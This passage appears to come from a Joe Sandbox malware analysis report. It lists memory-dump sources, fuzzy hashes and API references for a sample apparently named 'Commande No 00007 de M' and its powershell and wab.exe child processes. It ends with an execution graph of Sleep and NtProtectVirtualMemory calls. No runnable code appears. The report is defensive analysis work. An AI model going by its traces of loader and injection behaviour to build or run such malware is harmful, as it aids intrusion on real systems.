                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                        • lstrcmpiA.KERNEL32(00405B03,00000000), ref: 004058FC
                                                        • CharNextA.USER32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 0040590D
                                                        • lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                        • Instruction ID: 62085d2c31476900ff85a65f94f7eb43c3272102ba613799eb3dd48313e2814d
                                                        • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                        • Instruction Fuzzy Hash: 12F0C232604418FFC7129FA5DC0099EBBA8EF46360B2140A9E800F7210D674EF019BA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fa9d975816f56a0a4e58107670d1976fd1390c7588f9a931972a4ac93b9d7f0
                                                        • Instruction ID: 6da3aa1aaab1b862b498d57fcc086f689aaa3cdbec458f09db5bb882a361096d
                                                        • Opcode Fuzzy Hash: 7fa9d975816f56a0a4e58107670d1976fd1390c7588f9a931972a4ac93b9d7f0
                                                        • Instruction Fuzzy Hash: 51F25E74A00314CFDB64EF24C951BAAB7B2BF89304F1084A9D55AAB781DB31ED91CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V\k
                                                        • API String ID: 0-79730572
                                                        • Opcode ID: f47b8eaa4e06c040a592221214874fc641323576538d72a90a5e784e1ab3f938
                                                        • Instruction ID: ce89eb651a0d5631ba45a5003abfbc7a530f29422015ddb9bc1008b9a4605e06
                                                        • Opcode Fuzzy Hash: f47b8eaa4e06c040a592221214874fc641323576538d72a90a5e784e1ab3f938
                                                        • Instruction Fuzzy Hash: 2CB14C71E00209CFEB18DFA9D88579EBBF2BF88704F148529D815A7364FB74A845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df0bd34c4cb4f3753da23e67ef9af4d53e9a979396eff0b3d494bf3018dcf3bd
                                                        • Instruction ID: 3df6721995a4c1d32ca8d0fe9973aa56907345428d76663403c1cd9e3d4f178f
                                                        • Opcode Fuzzy Hash: df0bd34c4cb4f3753da23e67ef9af4d53e9a979396eff0b3d494bf3018dcf3bd
                                                        • Instruction Fuzzy Hash: C8B15C70E00609DFDF14CFA9D88579EBBF2AF88714F148529D815EB3A4EB74A841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8N\k$h]\k$h]\k$h]\k$I\k
                                                        • API String ID: 0-3534282386
                                                        • Opcode ID: f656448196de2b9f731ff502d4d25b7a5d0571e9777da2fd08965d49b17ca404
                                                        • Instruction ID: e0dbb58400060f48a936992316a35392c1aa63f801294e60c97f326b5b398e6c
                                                        • Opcode Fuzzy Hash: f656448196de2b9f731ff502d4d25b7a5d0571e9777da2fd08965d49b17ca404
                                                        • Instruction Fuzzy Hash: 60125230B002188FDB25DB74C8556ADB7B2BF89341F1480A9D90AAB361DF35EE95CF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V\k
                                                        • API String ID: 0-79730572
                                                        • Opcode ID: 0adb888500bec79e98d8c520ad2f02ecdfea119f92d05114dd632f1db7a9eff7
                                                        • Instruction ID: 1e66b850f611b1aa8642c026c93529f2920643cec384d32243b70beb11741d14
                                                        • Opcode Fuzzy Hash: 0adb888500bec79e98d8c520ad2f02ecdfea119f92d05114dd632f1db7a9eff7
                                                        • Instruction Fuzzy Hash: 31B15B70E00209CFEB14DFA9D88579EBBF2BF88714F148529D815A7364EB74A845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6718760ef8805f10225f0180971e22da6d24da552732149b410b12ddbf0be4ec
                                                        • Instruction ID: 4d82fb56985ef4d410ceb2d14dd42d9824f1bdd579c754fd205998170054bde3
                                                        • Opcode Fuzzy Hash: 6718760ef8805f10225f0180971e22da6d24da552732149b410b12ddbf0be4ec
                                                        • Instruction Fuzzy Hash: 79B2A074A00314CFDB64DF24C951BAAB7B2BF89304F5084A9D45A6B381DB35ED92CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75df4331effc93f2842e157a85b682a7e1e068844721dc53cae4b25674de02c2
                                                        • Instruction ID: 7cf8dd0510367a4e6776162321fccca783f5f79d2bb18d93cb2f2bb059222c0a
                                                        • Opcode Fuzzy Hash: 75df4331effc93f2842e157a85b682a7e1e068844721dc53cae4b25674de02c2
                                                        • Instruction Fuzzy Hash: 2792F470A00315DFDB64EF68C851BAEB7B2AF85700F5484AAD91AAB380DB31ED51CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67fae0f014a8f236328d8243300e8b3245d23dff85ca70e644b323b126590858
                                                        • Instruction ID: 58ea60626d8ace449ef98a7795cc2fde787940cf43da784a960580c9d4c0f8b2
                                                        • Opcode Fuzzy Hash: 67fae0f014a8f236328d8243300e8b3245d23dff85ca70e644b323b126590858
                                                        • Instruction Fuzzy Hash: 2872CF70A00355CFEB64EF64C850BAAB7B2AF85300F4085ADD91AAB780DB35ED91CF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5be095bb5399f4820c9849771cc2828f94d66c300a36a61a404f258ea4ba0fe7
                                                        • Instruction ID: fdf636b223dc0aa0ec9a01b22300c6d1d6bb8d115e0e4e22fbbdae5dd68fb2b1
                                                        • Opcode Fuzzy Hash: 5be095bb5399f4820c9849771cc2828f94d66c300a36a61a404f258ea4ba0fe7
                                                        • Instruction Fuzzy Hash: DA124BB1B143458FD756AB78881176BBBA2AFC2210F64C0BAD515CF2D5EB32CC51CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2b5269a28e4b5b3a6c8b8dae980d5272fd11843ef58d5702ab4a01abae874a6
                                                        • Instruction ID: 61bb4cf979fdd4d8591c447e0cec6aac2498e94a6955ab244aad0e0cc76dd7af
                                                        • Opcode Fuzzy Hash: f2b5269a28e4b5b3a6c8b8dae980d5272fd11843ef58d5702ab4a01abae874a6
                                                        • Instruction Fuzzy Hash: 1F126B7170430A8FD766AF69C45076ABBE2AFCA210F1580ABD549CF391DB31CD49CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 189aad47a8c390f7e85b5784ecf0b5ed4821ee70122512ae5cf98899db64096e
                                                        • Instruction ID: 310c1b0a94c949a17034cb2ec2a0c1d4ffe67cd8ecdbadc8fb58e90b9abe5778
                                                        • Opcode Fuzzy Hash: 189aad47a8c390f7e85b5784ecf0b5ed4821ee70122512ae5cf98899db64096e
                                                        • Instruction Fuzzy Hash: 3F32B274A00314CFDB64DF64C850BAAB7B2BF89300F5084A9D95A5B381DB35ED92CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 715e6b4205a258dc78f4094a9471954631aeaf184280423b2271f8b50365179b
                                                        • Instruction ID: 7e29685212a9e119161f265ee13d526f8f865dd8ef8c1671cd51b5f1e685887c
                                                        • Opcode Fuzzy Hash: 715e6b4205a258dc78f4094a9471954631aeaf184280423b2271f8b50365179b
                                                        • Instruction Fuzzy Hash: 1D12DEB1B002099FD754DB98C451AAABBF2AF8A314F14C06DE9059F385DB72EC42CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfbb9c4f8630a7b7f7128e48cbaa7c5c71cdd293528a8b7a3df78f0722d74295
                                                        • Instruction ID: aae1ceae16e4db781a440232120f3d2cc520e170d7d9673431b4683f675ca904
                                                        • Opcode Fuzzy Hash: cfbb9c4f8630a7b7f7128e48cbaa7c5c71cdd293528a8b7a3df78f0722d74295
                                                        • Instruction Fuzzy Hash: C7125AB4A00242DFDB54DF88C541E6ABBB2AF85314F15C1A9ED159B392CB72ED42CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53b9ec2e80665ed87668b061e2a40e3767246b6e801539cdc296265b2130f884
                                                        • Instruction ID: 843f373434604aa3f5c613ba2a46506817e98e2fdb748c1f90b21750183cf0b5
                                                        • Opcode Fuzzy Hash: 53b9ec2e80665ed87668b061e2a40e3767246b6e801539cdc296265b2130f884
                                                        • Instruction Fuzzy Hash: B2124EB0A00315CFEBA5EF24C951BA9B7B2BB45304F0184D9E55AAB381DB31ED91CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36672423db0f79d59c878b7dd531640152b91b5ddfb85d91db7cb0d00cb64239
                                                        • Instruction ID: b49fa97ff237f07ca9411433e2d2b611eef5924ee7a67b1a1b79c5407aec9f77
                                                        • Opcode Fuzzy Hash: 36672423db0f79d59c878b7dd531640152b91b5ddfb85d91db7cb0d00cb64239
                                                        • Instruction Fuzzy Hash: C9124EB0A00315CFDBA5EF24C951BA9B7B2BB45304F0184D9E55AAB381DB71ED81CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac2be0d40b6793312447f7c7d176f29285ab9e45bdbebaeb79802eba9dcbcfb1
                                                        • Instruction ID: 626d66507d8b1f87d8c1eb71b228b910514763ff8fcaf13e964b555e01ae44f2
                                                        • Opcode Fuzzy Hash: ac2be0d40b6793312447f7c7d176f29285ab9e45bdbebaeb79802eba9dcbcfb1
                                                        • Instruction Fuzzy Hash: E302AAB6A00209AFDB54DF58C541BAABBB2EF85318F14C06DE9059B391CB72ED42DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8f914b9fa79b8e8a71d53ad75fb5cde3809d807851e3c16feeb1bd5a13e947d
                                                        • Instruction ID: 1c93053d151d3018d9da5b2ce286657a25f9221536b78dcf61c407084628c0ca
                                                        • Opcode Fuzzy Hash: b8f914b9fa79b8e8a71d53ad75fb5cde3809d807851e3c16feeb1bd5a13e947d
                                                        • Instruction Fuzzy Hash: 50F19AB2A00209AFDB54DF58C441EA9BBF2AF89314F15C1ADE905AB391C772EC42DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f04ff021f2dd40d5c336d6f63ca77e8efb2a481a6e0e3a6d1a0fa3689954dfd5
                                                        • Instruction ID: cded4dcbf45e006a1100f25d413590cd4d6fe87aa3fbb2888a7845f048f821d7
                                                        • Opcode Fuzzy Hash: f04ff021f2dd40d5c336d6f63ca77e8efb2a481a6e0e3a6d1a0fa3689954dfd5
                                                        • Instruction Fuzzy Hash: 82F11874A00209DFDB15CFA8D494AADFBB2FF88310F248559E915AB365D731ED82CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2df9ddca1adea7ef188f0413824de8bf401710218d17ec9c8a1329837f65bddd
                                                        • Instruction ID: d3e24ddc6b9656e798b048f33ce2eac8285618f89aff87e9a5d3497097b10c72
                                                        • Opcode Fuzzy Hash: 2df9ddca1adea7ef188f0413824de8bf401710218d17ec9c8a1329837f65bddd
                                                        • Instruction Fuzzy Hash: FAE17CB1A00205CFDB54EB68C451BAEBBB3EB85304F24C069E9056F395DB71ED628F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1390d3c98572d1c40d0742dbeb1f14d855a24fa68e8a65f277ed782c4b73a8a5
                                                        • Instruction ID: eaa997989b85e3e6ca50cd857a1a8a608e0d697f3f68b22be362cd01cc35d9d5
                                                        • Opcode Fuzzy Hash: 1390d3c98572d1c40d0742dbeb1f14d855a24fa68e8a65f277ed782c4b73a8a5
                                                        • Instruction Fuzzy Hash: 9CC17E35A00208DFCB14DFA4D944AADBBB2FF85311F158559E806AB365EB35ED49CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 509a5b3a32982444e1712b2b56df6de89dbc4b81a75a5790ea38586973b5a48a
                                                        • Instruction ID: 18b0e0273ec3a94f9c6bd55ef40c353173dbe8ae395019e5010bcb78f49bde42
                                                        • Opcode Fuzzy Hash: 509a5b3a32982444e1712b2b56df6de89dbc4b81a75a5790ea38586973b5a48a
                                                        • Instruction Fuzzy Hash: 68B16D70E0060ADFDF14CFA9D88579EBBF2AF48714F148529D815EB3A4EB74A841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ae4d284559bac221b6c7d79094d439412fb248e512b99923d413e5181a7f232
                                                        • Instruction ID: 55664bb1fd6ca9ab0d99aecdeeea77a9cf1cb25099e14890763f14648251d7e8
                                                        • Opcode Fuzzy Hash: 3ae4d284559bac221b6c7d79094d439412fb248e512b99923d413e5181a7f232
                                                        • Instruction Fuzzy Hash: 3B716DB27103058FCB65AB79884136ABBE7EF86651F14807AD845CB3C1EB31D961CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea2ab97d92bdeafac4bc467fe2afd4a830250eb8ad6a3694a9b83b327219a490
                                                        • Instruction ID: 64103b892b9f62df0fa1291968874f1e8e5fcfb5299ae23428d87e5cc9a623d4
                                                        • Opcode Fuzzy Hash: ea2ab97d92bdeafac4bc467fe2afd4a830250eb8ad6a3694a9b83b327219a490
                                                        • Instruction Fuzzy Hash: 08919BB0A00205DFDB54EF58C845AAAB7F3EF89310F148069E906AB391DB72DC61CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1553d4b3794508f5f91707c381a094b2e4f8fc6940b725e701450d9bc77dacbb
                                                        • Instruction ID: 166d903605746fb3e2aa432b1db96dfc5042387c0a0c4854d2b1685b6251a6c1
                                                        • Opcode Fuzzy Hash: 1553d4b3794508f5f91707c381a094b2e4f8fc6940b725e701450d9bc77dacbb
                                                        • Instruction Fuzzy Hash: 2A917A74A00205CFCB15CF58C4A4AAABBB1FF88310F25869AD955AB3A5D735FC51CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c42aeffc3bb97a7b48aa8b82d5fe826ceda0fdff741a91bd1ac5df40f196e31
                                                        • Instruction ID: fe9fb5c696e8ea1f2f7f9662df68431438b977c6dc803ff24e46cb23a4aae53a
                                                        • Opcode Fuzzy Hash: 1c42aeffc3bb97a7b48aa8b82d5fe826ceda0fdff741a91bd1ac5df40f196e31
                                                        • Instruction Fuzzy Hash: C591ADB1A002019FDB55DF54C445BAABBF3EF89310F158069E8156B392CB72EDA1CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59d7a47f1eb1860eb7ca6c9652ceca843370c81e94b64b2260f04618d1e034c4
                                                        • Instruction ID: 536bf913e09f5413c402b84e9bc8a5fc952d6e89b72edd5e4934c26b57accfcf
                                                        • Opcode Fuzzy Hash: 59d7a47f1eb1860eb7ca6c9652ceca843370c81e94b64b2260f04618d1e034c4
                                                        • Instruction Fuzzy Hash: 33717A31A00209CFDB14DF68C890A9EBBF2FF89315F14856AD855DB761EB71AC46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7bae3bdf176f636e7ab5ee14c34c55710f7206ca87257b8c80475d17a9af1dbf
                                                        • Instruction ID: 111236ab6d18641cb583e7545c9190b1506ab0ddc7b4f7310e702e3aea444c43
                                                        • Opcode Fuzzy Hash: 7bae3bdf176f636e7ab5ee14c34c55710f7206ca87257b8c80475d17a9af1dbf
                                                        • Instruction Fuzzy Hash: DF715070A00208DFDB14DFB5D894BADBBF2BF88345F14852AD811AB7A1DB35AD45CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be07fa85aa331d8c322ae1cf9b89885449d59f4be03eb23fcbaf17704f89f85f
                                                        • Instruction ID: 224be9834e6491043cd8ef07906a7038c0c18aa9a4d3527c714c96f19c2eae88
                                                        • Opcode Fuzzy Hash: be07fa85aa331d8c322ae1cf9b89885449d59f4be03eb23fcbaf17704f89f85f
                                                        • Instruction Fuzzy Hash: 0B413DB16043028FCB66EFA58401BBB7BA29F81290B34409AE4109F2D5E732DD51CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage: 3.2%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 100%
                                                        Total number of Nodes: 4
                                                        Total number of Limit Nodes: 0

                                                        Execution graph nodes:
                                                        • 221: 5c4c53d
                                                        • 222: 5c4c585
                                                        • 223: 5c4c5d0 (Sleep)
                                                        • 224: 5c4c5da (NtProtectVirtualMemory)

                                                        Execution graph edges:
                                                        • 221 -> 222
                                                        • 222 -> 221
                                                        • 222 -> 223
                                                        • 222 -> 224
                                                        • 223 -> 221
                                                        • 224 -> 222

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNEL32(00000005), ref: 05C4C5D2
                                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 05C4C621
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3316408307.0000000005712000.00000040.00000400.00020000.00000000.sdmp, Offset: 05712000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5712000_wab.jbxd
                                                        Similarity
                                                        • API ID: MemoryProtectSleepVirtual
                                                        • String ID:
                                                        • API String ID: 3235210055-0
                                                        • Opcode ID: 97ff6069b18f2fae4f4c45e159c70b3450bb74d014f4a24ec967c84f64ffd2fd
                                                        • Instruction ID: ccd0f57f7d22364f69c2add48c11b6964056183a2322f5c12c50e5598e11bf6e
                                                        • Opcode Fuzzy Hash: 97ff6069b18f2fae4f4c45e159c70b3450bb74d014f4a24ec967c84f64ffd2fd
                                                        • Instruction Fuzzy Hash: 6E1123B16453418FE3049E7A898CF4E77A5AF14355F0286A8EE05CB0B5DB74CDC08E11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%